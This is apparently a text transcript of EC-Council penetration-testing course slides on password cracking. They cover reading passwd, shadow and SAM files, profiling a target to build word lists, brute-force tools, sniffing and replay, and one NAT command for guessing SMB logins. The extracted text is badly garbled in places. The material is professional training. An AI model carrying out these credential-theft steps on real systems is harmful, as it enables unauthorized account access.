LPTv4 Module 25 Password Cracking Penetration Testing_NoRestriction
-
Upload
mahmoud-eladawi -
Category
Documents
-
view
128 -
download
6
description
Transcript of LPTv4 Module 25 Password Cracking Penetration Testing_NoRestriction
/ECSA/LPT
EC CouncilEC-Council Module XXV
Password Cracking Penetration Testing
Penetration Testing Roadmap
Start HereInformation Vulnerability External
Gathering Analysis Penetration Testing
Fi ll Router and InternalFirewall
Penetration Testing
Router and Switches
Penetration Testing
Internal Network
Penetration Testing
IDS
Penetration Testing
Wireless Network
Penetration Testing
Denial of Service
Penetration Testing
Password Cracking
Stolen Laptop, PDAs and Cell Phones
Social EngineeringApplication
Cont’d
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Penetration TestingPenetration Testing Penetration TestingPenetration Testing
Penetration Testing Roadmap (cont’d)(cont d)
Cont’dPhysical S i
Database P i i
VoIP P i T iSecurity
Penetration Testing
Penetration testing Penetration Testing
Vi dVirus and Trojan
Detection
War Dialing VPN Penetration Testing
Log Management
Penetration Testing
File Integrity Checking
Blue Tooth and Hand held
Device Penetration Testing
Telecommunication And Broadband Communication
Email Security Penetration Testing
Security Patches
Data Leakage Penetration Testing
End Here
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Communication Penetration Testing
gPenetration Testing
Penetration Testing
Passwords
Companies protect their resources by using combinations of user IDs Companies protect their resources by using combinations of user IDs and passwords.
k b f h d f b li iHackers can brute force or guess the passwords of web applications.
Some system software products use weak or no encryption to store d/ i h i ID d d f h li h and/or transmit their userIDs and passwords from the client to the
server.
One of the leading causes of network compromises is the use of easily One of the leading causes of network compromises is the use of easily guessable or decipherable passwords.
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Common Password Vulnerabilities
Weak passwords are:
• Easily guessable, i.e. pet names, car number, family member’s name, etc.
p
• Comprised of common vocabulary words.
Improper handling of strong passwords:
• Involves the need for the user to write down the password in an insecure location.
Improper handling of strong passwords:
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Password Cracking Techniques
• Guessing • Shoulder surfing Social engineering:
Using password crackers or network analyzers
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Types of Password Cracking AttacksAttacks
Dictionary attacks: These attacks compare a set of words against a password database.
Brute-force attack: This attack checks for all combination of letters and Brute force attack: This attack checks for all combination of letters and numbers until the password is found.
H b id tt k Thi tt k k d b ddi b d Hybrid attack: This attack cracks any password by adding numbers and symbols to a file name.
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Steps in Password Cracking Penetration TestingPenetration Testing
Extract/etc/passwd and /etc/shadow files in Linux systems
Extract SAM file Windows machines
Identify the target person’s personal profile
Build a dictionary of word listsBuild a dictionary of word lists
Attempt to guess passwords
Brute force passwords
U d d k b k d d fil
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Use automated passwords crackers to break passwords protected files
Step1: Extract /etc/passwd and /etc/shadow Files in Linux Systems/ / y
root:!:0:0:root:/root:/bin/tcsh
bin:!:1:1:bin:/bin:
daemon:!:2:2:daemon:/sbin:daemon:!:2:2:daemon:/sbin:
adm:!:3:4:adm:/var/adm:
lp:!:4:7:lp:/var/spool/lpd:
sync:!:5:0:sync:/sbin:/bin/sync
shutdown:!:6:0:shutdown:/sbin:/sbin/shutdown
halt:!:7:0:halt:/sbin:/sbin/halt
The password file for Linux is located in /etc and is a text file called passwd.
7 / b / b /
mail:!:8:12:mail:/var/spool/mail:
news:!:9:13:INN (NNTP Server) Admin ID, 525-2525:/usr/local/lib/inn:/bin/ksh
uucp:!:10:14:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico
operator:!:0:0:operator:/root:/bin/tcsh
By default and design, this file is world readable by anyone on the system operator:!:0:0:operator:/root:/bin/tcsh
games:!:12:100:games:/usr/games:
man:!:13:15:man:/usr/man:
postmaster:!:14:12:postmaster:/var/spool/mail:/bin/tcsh
httpd:!:15:30:httpd:/usr/sbin:/usr/sbin/httpd:
nobody:!:65535:100:nobody:/dev/null:
readable by anyone on the system.
On a Unix system using NIS/yp or nobody:!:65535:100:nobody:/dev/null:
ftp:!:404:100::/home/ftp:/bin/nologin
nomad:!:501:100:Simple Nomad, 525-5252:/home/nomad:/bin/bash
webadmin:!:502:100:Web Admin Group ID:/home/webadmin:/bin/bash
h ! Si l N d' Old
On a Unix system using NIS/yp or password shadowing the password data may be located elsewhere. This "shadow" file is usually where the password hashes themselves are located
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
thegnome:!:503:100:Simple Nomad's Old Account:/home/thegnome:/bin/tcsh
dorkus:!:504:100:Alternate account for Fred:/home/dorkus:/bin/tcsh
themselves are located.
Linux Password Example
nomad:HrLNrZ3VS3TF2:501:100: Simple Nomad:/home/nomad:/bin/bash
This is what the fields actually are:
• Account or user name, what you type in at the login prompt nomad:
• One way encrypted password (plus any aging info) HrLNrZ3VS3TF2:
• User number 501:
• Group number 100:
• GECOS information Simple Nomad:
• Home directory /home/nomad:
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
• Program to run on login, usually a shell /bin/bash:
Linux Shadow File Example
nomad:$1$fnffc$GteyHdicpGOfffXX40w#5:13064:0:99999:7
This is what the fields actually are:
• Account or user name, what you type in at the login prompt nomad: , y yp g p pnomad:
• Password$1$fnffc$GteyHdicpGOfffX
X40w#5:
• Last password changed13064:
• Minimum number of days required between password changes0: changes
• Maximum number of days the password is valid99999:
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
• The number of days the user warned before the expiration date of password7:
Check Other Linux & UNIX Variants Variants
Passwords can also be stored in these files:
• /etc/security/passwd (accessible by root only)• / secure/etc/passwd (accessible by root only)
Passwords can also be stored in these files:
• /.secure/etc/passwd (accessible by root only)
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Step 2: Extract SAM File Windows Machines
Windows 2000/XP passwords are stored in Windows 2000/XP passwords are stored in c:\winnt\system32\etc\SAM.
The file is named SAM (locked when WINNT is running).
SAMDUMP
Extraction tools:
• SAMDUMP• PWDUMP• L0phtcrack
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Extract Backup of SAM/Emergency Repair Disk SAM/Emergency Repair Disk
Windows also store passwords in either a backup of the SAM file in the c:\winnt\repair directory or on an emergency repair disk.
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Check Registry
Windows applications store passwords in the Registry or as pp p g yplaintext files on the hard drive.
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Check the Microsoft’s Server Message Block (SMB) ProtocolMessage Block (SMB) Protocol
Check for the vulnerability SMB protocol that is used for file and print h isharing
Run NetBIOS Auditing Tool (NAT) and extract the passwords using the f ll i dfollowing command:
nat -u userlist.txt -p passlist.txt testing IP_address
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Check the Active Directory Database Database
Ch k f d i th ti di t d t b fil Check for passwords in the active directory database file that are stored locally or spread across domain controllers.
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Step 3: Identify the Target Person’s Personal ProfilePerson s Personal Profile
If you are trying to guess Rebecca’s password on her desktop,y y g g p p,then compile a list of items she likes.
E l
• Favorite car
Example:
• Birthday, anniversary day, and other special occasions• Movies, music, sports, drama, and arts• Education, cartoon characters, novelists• Parents, relatives, kids names• Country, city, holiday resorts, etc.• Project working on
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
j g
Step 4: Build a Dictionary of Word ListsWord Lists
Build a word list based on the information from the previousu d a o d st based o t e o at o o t e p e ousslide.
• Dictionary maker• Pass list
Tools:
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Step 5: Attempt to Guess PasswordsPasswords
Obtaining a legitimate user ID is not a easy taskObtaining a legitimate user ID is not a easy task
Creation of user ID involves a variation of employee's first name and last name
Email address posted on the organizations website depicts a sample user ID format
Acquiring a copy of organization’s internal telephone directory enables in discovering and constructing a valid user ID
Many system software products are initially configured with default user IDs and Many system software products are initially configured with default user IDs and passwords
User IDs and passwords designed enables vendors to perform remote i
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
transactions
Step 6: Brute Force Passwords
Run a dictionary attack and brute-force to crack passwordsRun a dictionary attack and brute force to crack passwords
Tools:
• Brutus• L0phtcrack• Munga bunga• Password cracker
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Step 6: Brute Force Passwords (cont’d)(cont d)
Resources:
• www.antifork.org • www.bindview.com • www.cerberus-infosec.co.uk • www.hackersclub.com • www.hoobie.net • www.intrusion.com • www.nai.com • www.nmrc.org www.nmrc.org • http://packetstorm.decepticons.org • www.phenoelit.de • www.securitysoftwaretech.com • www.users.dircon.co.uk/~crypto www.users.dircon.co.uk/ crypto • www.waveset.com • ftp://ftp.cerias.purdue.edu/pub/dict• ftp://ftp.ox.ac.uk/pub/wordlists• packetstormsecurity nl/Crackers/wordlists
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
• packetstormsecurity.nl/Crackers/wordlists• http://www.outpost9.com/files/WordLists.html
Step 7: Use Automated Passwords Crackers to Break Passwords Protected Files
Automated password cracking Brutus www.antifork.org/ho
obie.net
C b I t t S bp g
tools systematically guess passwords.
Cerberus Internet Scanner www.cerberus-infosec.co.uk
Crack www.users.dircon.co.uk/~crypto
CyberCop Scanner[a] www.nai.com
Tools: Inactive Account Scanner www.waveset.com
Legion and NetBIOS Auditing Tool (NAT)
www.hackersclub.com
LOphtcrack www.securitysoftwaretech.com
John the Ripper SAMDump www nmrc orgJohn the Ripper, SAMDump, PWDump, PWDump2, PWDump3
www.nmrc.org
SecurityAnalyst www.intrusion.com
TeeNet www.phenoelit.de
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
WebCrack www.packetstorm.decepticons.org
Extract Cleartext Passwords from the Dictionaryy
Logon passwords are stored:
• (HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon)
Logon passwords are stored:
NT\CurrentVersion\Winlogon)
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Extract Cleartext Passwords from an Encrypted LM hashan Encrypted LM hash
Use the Cain and Abel tool to extract cleartext password from an encrypted LM hash.encrypted LM hash.
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Sniff Cleartext Passwords from the Wirethe Wire
FTP HTTP POP SMTP IMAP d d FTP, HTTP, POP3, SMTP, IMAP send passwords as cleartext.
Run a sniffer to capture them.
• dsniffTool:
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Replay Attack to Crack Password
A replay attack intercepts the data packets and resends them to p y p pthe receiving server without decryption.
Intercept the communication using network analyzer or sniffer such as Ethereal, TCP dump, or WinDump.
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Tool: SAMInside 2.5.8.0 (pwdump)(pwdump)
Extracts Windows NT/2000/XP/2003 users' names and Extracts Windows NT/2000/XP/2003 users names and passwords in national symbol encoding
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
SAMInside 2.5.8.0 (pwdump): ScreenshotScreenshot
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Tool: Dictionary Maker
Dictionary Maker is a tool to compose dictionaries (word lists) for y p ( )password recovery using multiple source text files.
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Tool: Password List Recovery 2.6
Password List Recovery shows all the passwords in the current Windows y puser's Password List (PWL) file.
They are kept in the Windows directory and have a .PWL extension.
password
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Password List Recovery 2.6: ScreenshotScreenshot
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Summary
Passwords protect computer resources and files from unauthorized access by malicious usersmalicious users.
A combination of passwords and UserIDs are used by companies to protect their resources against intrusion by hackers and thieves.
The password file for Linux is located in /etc and is a text file called passwd.
By default and design, the passwd file is world readable by anyone on the system, and might be unsuccessful in rising the protection levels against any of the users.
SAMDUMP is a tool that simplifies migration synchronization of that system.
A word list needs to be built up using the previous slides in order to break
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
A word list needs to be built up using the previous slides in order to break through the password of the victim.
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited